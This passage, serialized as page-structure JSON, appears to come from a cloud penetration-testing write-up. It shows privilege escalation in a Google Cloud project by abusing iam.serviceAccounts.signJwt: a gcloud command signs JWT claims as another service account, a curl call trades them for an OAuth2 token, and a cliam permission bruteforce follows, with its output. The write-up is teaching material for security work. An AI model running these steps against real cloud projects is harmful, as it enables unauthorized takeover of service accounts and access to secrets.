",{"type":32,"tag":104,"props":2282,"children":2284},{"className":2283},[],[2285],{"type":37,"value":2286},"platform-middleware",{"type":37,"value":2288}," service account. We will see in the next chapter how to abuse this privilege to elevate our privileges.",{"type":32,"tag":39,"props":2290,"children":2292},{"id":2291},"abusing-iamserviceaccountssignjwt",[2293],{"type":37,"value":2294},"Abusing iam.serviceAccounts.signJwt",{"type":32,"tag":46,"props":2296,"children":2297},{},[2298,2300,2309],{"type":37,"value":2299},"The permission ",{"type":32,"tag":2301,"props":2302,"children":2303},"strong",{},[2304],{"type":32,"tag":104,"props":2305,"children":2307},{"className":2306},[],[2308],{"type":37,"value":1360},{"type":37,"value":2310}," in Google Cloud allows a user or service to use a private key associated with a service account to sign a JSON Web Token (JWT).",{"type":32,"tag":46,"props":2312,"children":2313},{},[2314],{"type":37,"value":2315},"There are different use cases:",{"type":32,"tag":238,"props":2317,"children":2318},{},[2319,2329,2339],{"type":32,"tag":242,"props":2320,"children":2321},{},[2322,2327],{"type":32,"tag":2301,"props":2323,"children":2324},{},[2325],{"type":37,"value":2326},"Inter-service Authentication",{"type":37,"value":2328},": A service can generate a signed JWT to authenticate with other services.",{"type":32,"tag":242,"props":2330,"children":2331},{},[2332,2337],{"type":32,"tag":2301,"props":2333,"children":2334},{},[2335],{"type":37,"value":2336},"Temporary Access",{"type":37,"value":2338},": Generation of OAuth2 tokens based on a JWT to access Google APIs.",{"type":32,"tag":242,"props":2340,"children":2341},{},[2342,2347],{"type":32,"tag":2301,"props":2343,"children":2344},{},[2345],{"type":37,"value":2346},"OpenID Connect Authentication",{"type":37,"value":2348},": Used to prove the service account's identity to third-party 
services.",{"type":32,"tag":46,"props":2350,"children":2351},{},[2352,2354,2359],{"type":37,"value":2353},"What interests us is the second part - it is possible to create an OAuth2 token from a JWT to access the Google API, which will allow us to gain control over the ",{"type":32,"tag":104,"props":2355,"children":2357},{"className":2356},[],[2358],{"type":37,"value":2286},{"type":37,"value":2360}," service account.",{"type":32,"tag":46,"props":2362,"children":2363},{},[2364,2366,2372,2374],{"type":37,"value":2365},"Currently we are the freshly compromised service account thanks to implicit delegation: ",{"type":32,"tag":104,"props":2367,"children":2369},{"className":2368},[],[2370],{"type":37,"value":2371},"analytics@gr-proj-4.iam.gserviceaccount.com",{"type":37,"value":2373},", and our target will be the service account ",{"type":32,"tag":104,"props":2375,"children":2377},{"className":2376},[],[2378],{"type":37,"value":2379},"platform-middleware@gr-proj-4.iam.gserviceaccount.com",{"type":32,"tag":46,"props":2381,"children":2382},{},[2383],{"type":37,"value":2384},"First, we need to create our data part of our JWT like this:",{"type":32,"tag":113,"props":2386,"children":2387},{"lang":115},[2388],{"type":32,"tag":118,"props":2389,"children":2391},{"className":120,"code":2390,"language":115,"meta":7,"style":7},"export IAT=$(date +%s)\nexport EXP=$(($IAT + 3600))\ncat > claims.json \u003C\u003CEOF\n{\n\"iss\": \"platform-middleware@gr-proj-4.iam.gserviceaccount.com\",\n\"scope\": \"https://www.googleapis.com/auth/cloud-platform\",\n\"aud\": \"https://oauth2.googleapis.com/token\",\n\"exp\": $EXP,\n\"iat\": 
$IAT\n}\nEOF\n",[2392],{"type":32,"tag":104,"props":2393,"children":2394},{"__ignoreMap":7},[2395,2427,2459,2487,2494,2502,2510,2518,2526,2534,2541],{"type":32,"tag":127,"props":2396,"children":2397},{"class":129,"line":130},[2398,2402,2407,2412,2417,2422],{"type":32,"tag":127,"props":2399,"children":2400},{"style":299},[2401],{"type":37,"value":302},{"type":32,"tag":127,"props":2403,"children":2404},{"style":305},[2405],{"type":37,"value":2406}," IAT",{"type":32,"tag":127,"props":2408,"children":2409},{"style":311},[2410],{"type":37,"value":2411},"=$(",{"type":32,"tag":127,"props":2413,"children":2414},{"style":134},[2415],{"type":37,"value":2416},"date",{"type":32,"tag":127,"props":2418,"children":2419},{"style":139},[2420],{"type":37,"value":2421}," +%s",{"type":32,"tag":127,"props":2423,"children":2424},{"style":311},[2425],{"type":37,"value":2426},")\n",{"type":32,"tag":127,"props":2428,"children":2429},{"class":129,"line":361},[2430,2434,2439,2444,2449,2454],{"type":32,"tag":127,"props":2431,"children":2432},{"style":299},[2433],{"type":37,"value":302},{"type":32,"tag":127,"props":2435,"children":2436},{"style":305},[2437],{"type":37,"value":2438}," EXP",{"type":32,"tag":127,"props":2440,"children":2441},{"style":311},[2442],{"type":37,"value":2443},"=$((",{"type":32,"tag":127,"props":2445,"children":2446},{"style":305},[2447],{"type":37,"value":2448},"$IAT",{"type":32,"tag":127,"props":2450,"children":2451},{"style":322},[2452],{"type":37,"value":2453}," + 3600",{"type":32,"tag":127,"props":2455,"children":2456},{"style":311},[2457],{"type":37,"value":2458},"))\n",{"type":32,"tag":127,"props":2460,"children":2461},{"class":129,"line":402},[2462,2467,2472,2477,2482],{"type":32,"tag":127,"props":2463,"children":2464},{"style":134},[2465],{"type":37,"value":2466},"cat",{"type":32,"tag":127,"props":2468,"children":2469},{"style":299},[2470],{"type":37,"value":2471}," 
>",{"type":32,"tag":127,"props":2473,"children":2474},{"style":139},[2475],{"type":37,"value":2476}," claims.json",{"type":32,"tag":127,"props":2478,"children":2479},{"style":299},[2480],{"type":37,"value":2481}," \u003C\u003C",{"type":32,"tag":127,"props":2483,"children":2484},{"style":675},[2485],{"type":37,"value":2486},"EOF\n",{"type":32,"tag":127,"props":2488,"children":2489},{"class":129,"line":738},[2490],{"type":32,"tag":127,"props":2491,"children":2492},{"style":139},[2493],{"type":37,"value":649},{"type":32,"tag":127,"props":2495,"children":2496},{"class":129,"line":764},[2497],{"type":32,"tag":127,"props":2498,"children":2499},{"style":139},[2500],{"type":37,"value":2501},"\"iss\": \"platform-middleware@gr-proj-4.iam.gserviceaccount.com\",\n",{"type":32,"tag":127,"props":2503,"children":2504},{"class":129,"line":803},[2505],{"type":32,"tag":127,"props":2506,"children":2507},{"style":139},[2508],{"type":37,"value":2509},"\"scope\": \"https://www.googleapis.com/auth/cloud-platform\",\n",{"type":32,"tag":127,"props":2511,"children":2512},{"class":129,"line":838},[2513],{"type":32,"tag":127,"props":2514,"children":2515},{"style":139},[2516],{"type":37,"value":2517},"\"aud\": \"https://oauth2.googleapis.com/token\",\n",{"type":32,"tag":127,"props":2519,"children":2520},{"class":129,"line":847},[2521],{"type":32,"tag":127,"props":2522,"children":2523},{"style":139},[2524],{"type":37,"value":2525},"\"exp\": $EXP,\n",{"type":32,"tag":127,"props":2527,"children":2528},{"class":129,"line":975},[2529],{"type":32,"tag":127,"props":2530,"children":2531},{"style":139},[2532],{"type":37,"value":2533},"\"iat\": 
$IAT\n",{"type":32,"tag":127,"props":2535,"children":2536},{"class":129,"line":987},[2537],{"type":32,"tag":127,"props":2538,"children":2539},{"style":139},[2540],{"type":37,"value":853},{"type":32,"tag":127,"props":2542,"children":2543},{"class":129,"line":1000},[2544],{"type":32,"tag":127,"props":2545,"children":2546},{"style":675},[2547],{"type":37,"value":2486},{"type":32,"tag":46,"props":2549,"children":2550},{},[2551],{"type":37,"value":2552},"Here are the details of the JWT payload section:",{"type":32,"tag":238,"props":2554,"children":2555},{},[2556,2584,2609,2641,2655],{"type":32,"tag":242,"props":2557,"children":2558},{},[2559,2568,2570,2576],{"type":32,"tag":2301,"props":2560,"children":2561},{},[2562],{"type":32,"tag":104,"props":2563,"children":2565},{"className":2564},[],[2566],{"type":37,"value":2567},"iss",{"type":37,"value":2569}," – ",{"type":32,"tag":2571,"props":2572,"children":2573},"em",{},[2574],{"type":37,"value":2575},"Issuer",{"type":32,"tag":238,"props":2577,"children":2578},{},[2579],{"type":32,"tag":242,"props":2580,"children":2581},{},[2582],{"type":37,"value":2583},"The service account email address. 
This indicates who generated the JWT",{"type":32,"tag":242,"props":2585,"children":2586},{},[2587,2595,2596,2601],{"type":32,"tag":2301,"props":2588,"children":2589},{},[2590],{"type":32,"tag":104,"props":2591,"children":2593},{"className":2592},[],[2594],{"type":37,"value":1973},{"type":37,"value":2569},{"type":32,"tag":2571,"props":2597,"children":2598},{},[2599],{"type":37,"value":2600},"Access Scope",{"type":32,"tag":238,"props":2602,"children":2603},{},[2604],{"type":32,"tag":242,"props":2605,"children":2606},{},[2607],{"type":37,"value":2608},"One or more URLs indicating the requested permissions, used to specify which services or APIs in Google Cloud we want to use",{"type":32,"tag":242,"props":2610,"children":2611},{},[2612,2621,2622,2627],{"type":32,"tag":2301,"props":2613,"children":2614},{},[2615],{"type":32,"tag":104,"props":2616,"children":2618},{"className":2617},[],[2619],{"type":37,"value":2620},"aud",{"type":37,"value":2569},{"type":32,"tag":2571,"props":2623,"children":2624},{},[2625],{"type":37,"value":2626},"Audience",{"type":32,"tag":238,"props":2628,"children":2629},{},[2630],{"type":32,"tag":242,"props":2631,"children":2632},{},[2633,2635],{"type":37,"value":2634},"Google's OAuth2 endpoint URL, which specifies the intended recipient service of the JWT, in this case Google OAuth to obtain an ",{"type":32,"tag":104,"props":2636,"children":2638},{"className":2637},[],[2639],{"type":37,"value":2640},"access_token",{"type":32,"tag":242,"props":2642,"children":2643},{},[2644,2653],{"type":32,"tag":2301,"props":2645,"children":2646},{},[2647],{"type":32,"tag":104,"props":2648,"children":2650},{"className":2649},[],[2651],{"type":37,"value":2652},"exp",{"type":37,"value":2654}," – Expiration 
Time",{"type":32,"tag":242,"props":2656,"children":2657},{},[2658,2667],{"type":32,"tag":2301,"props":2659,"children":2660},{},[2661],{"type":32,"tag":104,"props":2662,"children":2664},{"className":2663},[],[2665],{"type":37,"value":2666},"iat",{"type":37,"value":2668}," – Issued At Time",{"type":32,"tag":46,"props":2670,"children":2671},{},[2672],{"type":37,"value":2673},"Then we will sign our JWT using the target service account:",{"type":32,"tag":113,"props":2675,"children":2676},{"lang":115},[2677],{"type":32,"tag":118,"props":2678,"children":2680},{"className":120,"code":2679,"language":115,"meta":7,"style":7},"gcloud iam service-accounts sign-jwt claims.json signed-jwt.txt \\\n  --iam-account=platform-middleware@gr-proj-4.iam.gserviceaccount.com\n",[2681],{"type":32,"tag":104,"props":2682,"children":2683},{"__ignoreMap":7},[2684,2720],{"type":32,"tag":127,"props":2685,"children":2686},{"class":129,"line":130},[2687,2691,2696,2701,2706,2710,2715],{"type":32,"tag":127,"props":2688,"children":2689},{"style":134},[2690],{"type":37,"value":109},{"type":32,"tag":127,"props":2692,"children":2693},{"style":139},[2694],{"type":37,"value":2695}," iam",{"type":32,"tag":127,"props":2697,"children":2698},{"style":139},[2699],{"type":37,"value":2700}," service-accounts",{"type":32,"tag":127,"props":2702,"children":2703},{"style":139},[2704],{"type":37,"value":2705}," sign-jwt",{"type":32,"tag":127,"props":2707,"children":2708},{"style":139},[2709],{"type":37,"value":2476},{"type":32,"tag":127,"props":2711,"children":2712},{"style":139},[2713],{"type":37,"value":2714}," signed-jwt.txt",{"type":32,"tag":127,"props":2716,"children":2717},{"style":150},[2718],{"type":37,"value":2719}," \\\n",{"type":32,"tag":127,"props":2721,"children":2722},{"class":129,"line":361},[2723],{"type":32,"tag":127,"props":2724,"children":2725},{"style":150},[2726],{"type":37,"value":2727},"  
--iam-account=platform-middleware@gr-proj-4.iam.gserviceaccount.com\n",{"type":32,"tag":46,"props":2729,"children":2730},{},[2731,2733,2738,2740,2745,2747,2752],{"type":37,"value":2732},"This command is launched from a service account ",{"type":32,"tag":104,"props":2734,"children":2736},{"className":2735},[],[2737],{"type":37,"value":2253},{"type":37,"value":2739},", which has been authorized via IAM to perform the action ",{"type":32,"tag":104,"props":2741,"children":2743},{"className":2742},[],[2744],{"type":37,"value":1360},{"type":37,"value":2746}," on the service account ",{"type":32,"tag":104,"props":2748,"children":2750},{"className":2749},[],[2751],{"type":37,"value":2286},{"type":37,"value":214},{"type":32,"tag":46,"props":2754,"children":2755},{},[2756],{"type":37,"value":2757},"This means that:",{"type":32,"tag":238,"props":2759,"children":2760},{},[2761,2779],{"type":32,"tag":242,"props":2762,"children":2763},{},[2764,2766,2771,2773,2778],{"type":37,"value":2765},"The ",{"type":32,"tag":104,"props":2767,"children":2769},{"className":2768},[],[2770],{"type":37,"value":2253},{"type":37,"value":2772}," account does not have the private key of ",{"type":32,"tag":104,"props":2774,"children":2776},{"className":2775},[],[2777],{"type":37,"value":2286},{"type":37,"value":214},{"type":32,"tag":242,"props":2780,"children":2781},{},[2782,2784,2789],{"type":37,"value":2783},"But it has the right to ask Google IAM to sign a JWT on its behalf, as if ",{"type":32,"tag":104,"props":2785,"children":2787},{"className":2786},[],[2788],{"type":37,"value":2286},{"type":37,"value":2790}," was doing it.",{"type":32,"tag":46,"props":2792,"children":2793},{},[2794],{"type":37,"value":2795},"To explain the command parameters in more 
detail:",{"type":32,"tag":238,"props":2797,"children":2798},{},[2799,2817,2834],{"type":32,"tag":242,"props":2800,"children":2801},{},[2802,2808,2810,2815],{"type":32,"tag":104,"props":2803,"children":2805},{"className":2804},[],[2806],{"type":37,"value":2807},"claims.json",{"type":37,"value":2809}," → Input file containing the ",{"type":32,"tag":2301,"props":2811,"children":2812},{},[2813],{"type":37,"value":2814},"data",{"type":37,"value":2816}," of the JWT to be signed (JSON format).",{"type":32,"tag":242,"props":2818,"children":2819},{},[2820,2826,2828,2833],{"type":32,"tag":104,"props":2821,"children":2823},{"className":2822},[],[2824],{"type":37,"value":2825},"signed-jwt.txt",{"type":37,"value":2827}," → Output file that will contain the ",{"type":32,"tag":2301,"props":2829,"children":2830},{},[2831],{"type":37,"value":2832},"signed JWT",{"type":37,"value":214},{"type":32,"tag":242,"props":2835,"children":2836},{},[2837,2843,2845,2850,2852,2857],{"type":32,"tag":104,"props":2838,"children":2840},{"className":2839},[],[2841],{"type":37,"value":2842},"--iam-account=platform-middleware@gr-proj-4.iam.gserviceaccount.com",{"type":37,"value":2844}," → Indicates that ",{"type":32,"tag":2301,"props":2846,"children":2847},{},[2848],{"type":37,"value":2849},"this service account",{"type":37,"value":2851}," (",{"type":32,"tag":104,"props":2853,"children":2855},{"className":2854},[],[2856],{"type":37,"value":2286},{"type":37,"value":2858},") should sign the JWT.",{"type":32,"tag":46,"props":2860,"children":2861},{},[2862],{"type":37,"value":2863},"Then we can exchange this signed JWT for an OAuth2 access token, which gives us access to the target service account.",{"type":32,"tag":113,"props":2865,"children":2866},{"lang":115},[2867],{"type":32,"tag":118,"props":2868,"children":2870},{"className":120,"code":2869,"language":115,"meta":7,"style":7},"curl -s -X POST https://oauth2.googleapis.com/token \\\n-H \"Content-Type: application/x-www-form-urlencoded\" \\\n-d 
\"grant_type=urn:ietf:params:oauth:grant-type:jwt-bearer&assertion=$(cat signed-jwt.txt)\" \\\n| jq -r .access_token\nya29.c.c0ASRK0Gbjv4[...SNIP...]irRX3JRyQrz1rS3xqVc8\n",[2871],{"type":32,"tag":104,"props":2872,"children":2873},{"__ignoreMap":7},[2874,2906,2931,2974,2997],{"type":32,"tag":127,"props":2875,"children":2876},{"class":129,"line":130},[2877,2882,2887,2892,2897,2902],{"type":32,"tag":127,"props":2878,"children":2879},{"style":134},[2880],{"type":37,"value":2881},"curl",{"type":32,"tag":127,"props":2883,"children":2884},{"style":150},[2885],{"type":37,"value":2886}," -s",{"type":32,"tag":127,"props":2888,"children":2889},{"style":150},[2890],{"type":37,"value":2891}," -X",{"type":32,"tag":127,"props":2893,"children":2894},{"style":139},[2895],{"type":37,"value":2896}," POST",{"type":32,"tag":127,"props":2898,"children":2899},{"style":139},[2900],{"type":37,"value":2901}," https://oauth2.googleapis.com/token",{"type":32,"tag":127,"props":2903,"children":2904},{"style":150},[2905],{"type":37,"value":2719},{"type":32,"tag":127,"props":2907,"children":2908},{"class":129,"line":361},[2909,2914,2918,2923,2927],{"type":32,"tag":127,"props":2910,"children":2911},{"style":322},[2912],{"type":37,"value":2913},"-H ",{"type":32,"tag":127,"props":2915,"children":2916},{"style":675},[2917],{"type":37,"value":668},{"type":32,"tag":127,"props":2919,"children":2920},{"style":139},[2921],{"type":37,"value":2922},"Content-Type: application/x-www-form-urlencoded",{"type":32,"tag":127,"props":2924,"children":2925},{"style":675},[2926],{"type":37,"value":668},{"type":32,"tag":127,"props":2928,"children":2929},{"style":150},[2930],{"type":37,"value":2719},{"type":32,"tag":127,"props":2932,"children":2933},{"class":129,"line":402},[2934,2939,2943,2948,2953,2957,2961,2966,2970],{"type":32,"tag":127,"props":2935,"children":2936},{"style":322},[2937],{"type":37,"value":2938},"-d 
",{"type":32,"tag":127,"props":2940,"children":2941},{"style":675},[2942],{"type":37,"value":668},{"type":32,"tag":127,"props":2944,"children":2945},{"style":139},[2946],{"type":37,"value":2947},"grant_type=urn:ietf:params:oauth:grant-type:jwt-bearer&assertion=",{"type":32,"tag":127,"props":2949,"children":2950},{"style":311},[2951],{"type":37,"value":2952},"$(",{"type":32,"tag":127,"props":2954,"children":2955},{"style":134},[2956],{"type":37,"value":2466},{"type":32,"tag":127,"props":2958,"children":2959},{"style":139},[2960],{"type":37,"value":2714},{"type":32,"tag":127,"props":2962,"children":2963},{"style":311},[2964],{"type":37,"value":2965},")",{"type":32,"tag":127,"props":2967,"children":2968},{"style":675},[2969],{"type":37,"value":668},{"type":32,"tag":127,"props":2971,"children":2972},{"style":150},[2973],{"type":37,"value":2719},{"type":32,"tag":127,"props":2975,"children":2976},{"class":129,"line":738},[2977,2982,2987,2992],{"type":32,"tag":127,"props":2978,"children":2979},{"style":299},[2980],{"type":37,"value":2981},"|",{"type":32,"tag":127,"props":2983,"children":2984},{"style":134},[2985],{"type":37,"value":2986}," jq",{"type":32,"tag":127,"props":2988,"children":2989},{"style":150},[2990],{"type":37,"value":2991}," -r",{"type":32,"tag":127,"props":2993,"children":2994},{"style":139},[2995],{"type":37,"value":2996}," .access_token\n",{"type":32,"tag":127,"props":2998,"children":2999},{"class":129,"line":764},[3000],{"type":32,"tag":127,"props":3001,"children":3002},{"style":134},[3003],{"type":37,"value":3004},"ya29.c.c0ASRK0Gbjv4[...SNIP...]irRX3JRyQrz1rS3xqVc8\n",{"type":32,"tag":46,"props":3006,"children":3007},{},[3008,3010,3015],{"type":37,"value":3009},"We can use the retrieved access token and begin enumerating the newly compromised service account (",{"type":32,"tag":104,"props":3011,"children":3013},{"className":3012},[],[3014],{"type":37,"value":2379},{"type":37,"value":3016},") with 
cliam:",{"type":32,"tag":113,"props":3018,"children":3019},{"lang":115},[3020],{"type":32,"tag":118,"props":3021,"children":3023},{"className":120,"code":3022,"language":115,"meta":7,"style":7},"cliam gcp --access-token=\"$CLOUDSDK_AUTH_ACCESS_TOKEN\"  --project-id gr-proj-4 bruteforce\nApr 04 00:38:49 DBG ● project=gr-proj-4 region=us-central1 zone=us-central1-a\nApr 04 00:38:54 INF ● compute.acceleratorTypes=get\nApr 04 00:38:54 INF ● compute.acceleratorTypes=list\nApr 04 00:38:54 INF ● compute.addresses=get\nApr 04 00:38:54 INF ● compute.addresses=list\nApr 04 00:38:54 INF ● compute.autoscalers=get\n[...SNIP...]\nApr 04 00:38:54 INF ● compute.zoneOperations=get\nApr 04 00:38:54 INF ● compute.zoneOperations=get-iam-policy\nApr 04 00:38:54 INF ● compute.zoneOperations=list\nApr 04 00:38:54 INF ● compute.zones=get\nApr 04 00:38:54 INF ● compute.zones=list\nApr 04 00:38:56 INF ● resourcemanager.projects=get\nApr 04 00:38:56 INF ● secretmanager.secrets=get\nApr 04 00:38:56 INF ● secretmanager.secrets=get-iam-policy\nApr 04 00:38:56 INF ● secretmanager.secrets=list\nApr 04 00:38:57 INF ● run.routes=invoke\nApr 04 00:38:57 INF ● serviceusage.quotas=get\nApr 04 00:38:57 INF ● serviceusage.services=get\nApr 04 00:38:57 INF ● serviceusage.services=list\n",[3024],{"type":32,"tag":104,"props":3025,"children":3026},{"__ignoreMap":7},[3027,3069,3105,3134,3162,3190,3218,3246,3262,3290,3318,3346,3374,3402,3431,3459,3487,3515,3544,3572,3600],{"type":32,"tag":127,"props":3028,"children":3029},{"class":129,"line":130},[3030,3034,3038,3043,3047,3052,3056,3061,3065],{"type":32,"tag":127,"props":3031,"children":3032},{"style":134},[3033],{"type":37,"value":467},{"type":32,"tag":127,"props":3035,"children":3036},{"style":139},[3037],{"type":37,"value":491},{"type":32,"tag":127,"props":3039,"children":3040},{"style":150},[3041],{"type":37,"value":3042}," 
--access-token=",{"type":32,"tag":127,"props":3044,"children":3045},{"style":675},[3046],{"type":37,"value":668},{"type":32,"tag":127,"props":3048,"children":3049},{"style":139},[3050],{"type":37,"value":3051},"$CLOUDSDK_AUTH_ACCESS_TOKEN",{"type":32,"tag":127,"props":3053,"children":3054},{"style":675},[3055],{"type":37,"value":668},{"type":32,"tag":127,"props":3057,"children":3058},{"style":150},[3059],{"type":37,"value":3060},"  --project-id",{"type":32,"tag":127,"props":3062,"children":3063},{"style":139},[3064],{"type":37,"value":506},{"type":32,"tag":127,"props":3066,"children":3067},{"style":139},[3068],{"type":37,"value":511},{"type":32,"tag":127,"props":3070,"children":3071},{"class":129,"line":361},[3072,3076,3080,3085,3089,3093,3097,3101],{"type":32,"tag":127,"props":3073,"children":3074},{"style":134},[3075],{"type":37,"value":519},{"type":32,"tag":127,"props":3077,"children":3078},{"style":522},[3079],{"type":37,"value":525},{"type":32,"tag":127,"props":3081,"children":3082},{"style":139},[3083],{"type":37,"value":3084}," 00:38:49",{"type":32,"tag":127,"props":3086,"children":3087},{"style":139},[3088],{"type":37,"value":535},{"type":32,"tag":127,"props":3090,"children":3091},{"style":139},[3092],{"type":37,"value":540},{"type":32,"tag":127,"props":3094,"children":3095},{"style":139},[3096],{"type":37,"value":545},{"type":32,"tag":127,"props":3098,"children":3099},{"style":139},[3100],{"type":37,"value":550},{"type":32,"tag":127,"props":3102,"children":3103},{"style":139},[3104],{"type":37,"value":555},{"type":32,"tag":127,"props":3106,"children":3107},{"class":129,"line":402},[3108,3112,3116,3121,3125,3129],{"type":32,"tag":127,"props":3109,"children":3110},{"style":134},[3111],{"type":37,"value":519},{"type":32,"tag":127,"props":3113,"children":3114},{"style":522},[3115],{"type":37,"value":525},{"type":32,"tag":127,"props":3117,"children":3118},{"style":139},[3119],{"type":37,"value":3120}," 
00:38:54",{"type":32,"tag":127,"props":3122,"children":3123},{"style":139},[3124],{"type":37,"value":576},{"type":32,"tag":127,"props":3126,"children":3127},{"style":139},[3128],{"type":37,"value":540},{"type":32,"tag":127,"props":3130,"children":3131},{"style":139},[3132],{"type":37,"value":3133}," compute.acceleratorTypes=get\n",{"type":32,"tag":127,"props":3135,"children":3136},{"class":129,"line":738},[3137,3141,3145,3149,3153,3157],{"type":32,"tag":127,"props":3138,"children":3139},{"style":134},[3140],{"type":37,"value":519},{"type":32,"tag":127,"props":3142,"children":3143},{"style":522},[3144],{"type":37,"value":525},{"type":32,"tag":127,"props":3146,"children":3147},{"style":139},[3148],{"type":37,"value":3120},{"type":32,"tag":127,"props":3150,"children":3151},{"style":139},[3152],{"type":37,"value":576},{"type":32,"tag":127,"props":3154,"children":3155},{"style":139},[3156],{"type":37,"value":540},{"type":32,"tag":127,"props":3158,"children":3159},{"style":139},[3160],{"type":37,"value":3161}," compute.acceleratorTypes=list\n",{"type":32,"tag":127,"props":3163,"children":3164},{"class":129,"line":764},[3165,3169,3173,3177,3181,3185],{"type":32,"tag":127,"props":3166,"children":3167},{"style":134},[3168],{"type":37,"value":519},{"type":32,"tag":127,"props":3170,"children":3171},{"style":522},[3172],{"type":37,"value":525},{"type":32,"tag":127,"props":3174,"children":3175},{"style":139},[3176],{"type":37,"value":3120},{"type":32,"tag":127,"props":3178,"children":3179},{"style":139},[3180],{"type":37,"value":576},{"type":32,"tag":127,"props":3182,"children":3183},{"style":139},[3184],{"type":37,"value":540},{"type":32,"tag":127,"props":3186,"children":3187},{"style":139},[3188],{"type":37,"value":3189}," 
compute.addresses=get\n",{"type":32,"tag":127,"props":3191,"children":3192},{"class":129,"line":803},[3193,3197,3201,3205,3209,3213],{"type":32,"tag":127,"props":3194,"children":3195},{"style":134},[3196],{"type":37,"value":519},{"type":32,"tag":127,"props":3198,"children":3199},{"style":522},[3200],{"type":37,"value":525},{"type":32,"tag":127,"props":3202,"children":3203},{"style":139},[3204],{"type":37,"value":3120},{"type":32,"tag":127,"props":3206,"children":3207},{"style":139},[3208],{"type":37,"value":576},{"type":32,"tag":127,"props":3210,"children":3211},{"style":139},[3212],{"type":37,"value":540},{"type":32,"tag":127,"props":3214,"children":3215},{"style":139},[3216],{"type":37,"value":3217}," compute.addresses=list\n",{"type":32,"tag":127,"props":3219,"children":3220},{"class":129,"line":838},[3221,3225,3229,3233,3237,3241],{"type":32,"tag":127,"props":3222,"children":3223},{"style":134},[3224],{"type":37,"value":519},{"type":32,"tag":127,"props":3226,"children":3227},{"style":522},[3228],{"type":37,"value":525},{"type":32,"tag":127,"props":3230,"children":3231},{"style":139},[3232],{"type":37,"value":3120},{"type":32,"tag":127,"props":3234,"children":3235},{"style":139},[3236],{"type":37,"value":576},{"type":32,"tag":127,"props":3238,"children":3239},{"style":139},[3240],{"type":37,"value":540},{"type":32,"tag":127,"props":3242,"children":3243},{"style":139},[3244],{"type":37,"value":3245}," 
compute.autoscalers=get\n",{"type":32,"tag":127,"props":3247,"children":3248},{"class":129,"line":847},[3249,3253,3257],{"type":32,"tag":127,"props":3250,"children":3251},{"style":311},[3252],{"type":37,"value":343},{"type":32,"tag":127,"props":3254,"children":3255},{"style":322},[3256],{"type":37,"value":348},{"type":32,"tag":127,"props":3258,"children":3259},{"style":311},[3260],{"type":37,"value":3261},"]\n",{"type":32,"tag":127,"props":3263,"children":3264},{"class":129,"line":975},[3265,3269,3273,3277,3281,3285],{"type":32,"tag":127,"props":3266,"children":3267},{"style":134},[3268],{"type":37,"value":519},{"type":32,"tag":127,"props":3270,"children":3271},{"style":522},[3272],{"type":37,"value":525},{"type":32,"tag":127,"props":3274,"children":3275},{"style":139},[3276],{"type":37,"value":3120},{"type":32,"tag":127,"props":3278,"children":3279},{"style":139},[3280],{"type":37,"value":576},{"type":32,"tag":127,"props":3282,"children":3283},{"style":139},[3284],{"type":37,"value":540},{"type":32,"tag":127,"props":3286,"children":3287},{"style":139},[3288],{"type":37,"value":3289}," compute.zoneOperations=get\n",{"type":32,"tag":127,"props":3291,"children":3292},{"class":129,"line":987},[3293,3297,3301,3305,3309,3313],{"type":32,"tag":127,"props":3294,"children":3295},{"style":134},[3296],{"type":37,"value":519},{"type":32,"tag":127,"props":3298,"children":3299},{"style":522},[3300],{"type":37,"value":525},{"type":32,"tag":127,"props":3302,"children":3303},{"style":139},[3304],{"type":37,"value":3120},{"type":32,"tag":127,"props":3306,"children":3307},{"style":139},[3308],{"type":37,"value":576},{"type":32,"tag":127,"props":3310,"children":3311},{"style":139},[3312],{"type":37,"value":540},{"type":32,"tag":127,"props":3314,"children":3315},{"style":139},[3316],{"type":37,"value":3317}," 
compute.zoneOperations=get-iam-policy\n",{"type":32,"tag":127,"props":3319,"children":3320},{"class":129,"line":1000},[3321,3325,3329,3333,3337,3341],{"type":32,"tag":127,"props":3322,"children":3323},{"style":134},[3324],{"type":37,"value":519},{"type":32,"tag":127,"props":3326,"children":3327},{"style":522},[3328],{"type":37,"value":525},{"type":32,"tag":127,"props":3330,"children":3331},{"style":139},[3332],{"type":37,"value":3120},{"type":32,"tag":127,"props":3334,"children":3335},{"style":139},[3336],{"type":37,"value":576},{"type":32,"tag":127,"props":3338,"children":3339},{"style":139},[3340],{"type":37,"value":540},{"type":32,"tag":127,"props":3342,"children":3343},{"style":139},[3344],{"type":37,"value":3345}," compute.zoneOperations=list\n",{"type":32,"tag":127,"props":3347,"children":3348},{"class":129,"line":1013},[3349,3353,3357,3361,3365,3369],{"type":32,"tag":127,"props":3350,"children":3351},{"style":134},[3352],{"type":37,"value":519},{"type":32,"tag":127,"props":3354,"children":3355},{"style":522},[3356],{"type":37,"value":525},{"type":32,"tag":127,"props":3358,"children":3359},{"style":139},[3360],{"type":37,"value":3120},{"type":32,"tag":127,"props":3362,"children":3363},{"style":139},[3364],{"type":37,"value":576},{"type":32,"tag":127,"props":3366,"children":3367},{"style":139},[3368],{"type":37,"value":540},{"type":32,"tag":127,"props":3370,"children":3371},{"style":139},[3372],{"type":37,"value":3373}," 
compute.zones=get\n",{"type":32,"tag":127,"props":3375,"children":3376},{"class":129,"line":1025},[3377,3381,3385,3389,3393,3397],{"type":32,"tag":127,"props":3378,"children":3379},{"style":134},[3380],{"type":37,"value":519},{"type":32,"tag":127,"props":3382,"children":3383},{"style":522},[3384],{"type":37,"value":525},{"type":32,"tag":127,"props":3386,"children":3387},{"style":139},[3388],{"type":37,"value":3120},{"type":32,"tag":127,"props":3390,"children":3391},{"style":139},[3392],{"type":37,"value":576},{"type":32,"tag":127,"props":3394,"children":3395},{"style":139},[3396],{"type":37,"value":540},{"type":32,"tag":127,"props":3398,"children":3399},{"style":139},[3400],{"type":37,"value":3401}," compute.zones=list\n",{"type":32,"tag":127,"props":3403,"children":3404},{"class":129,"line":1037},[3405,3409,3413,3418,3422,3426],{"type":32,"tag":127,"props":3406,"children":3407},{"style":134},[3408],{"type":37,"value":519},{"type":32,"tag":127,"props":3410,"children":3411},{"style":522},[3412],{"type":37,"value":525},{"type":32,"tag":127,"props":3414,"children":3415},{"style":139},[3416],{"type":37,"value":3417}," 00:38:56",{"type":32,"tag":127,"props":3419,"children":3420},{"style":139},[3421],{"type":37,"value":576},{"type":32,"tag":127,"props":3423,"children":3424},{"style":139},[3425],{"type":37,"value":540},{"type":32,"tag":127,"props":3427,"children":3428},{"style":139},[3429],{"type":37,"value":3430}," 
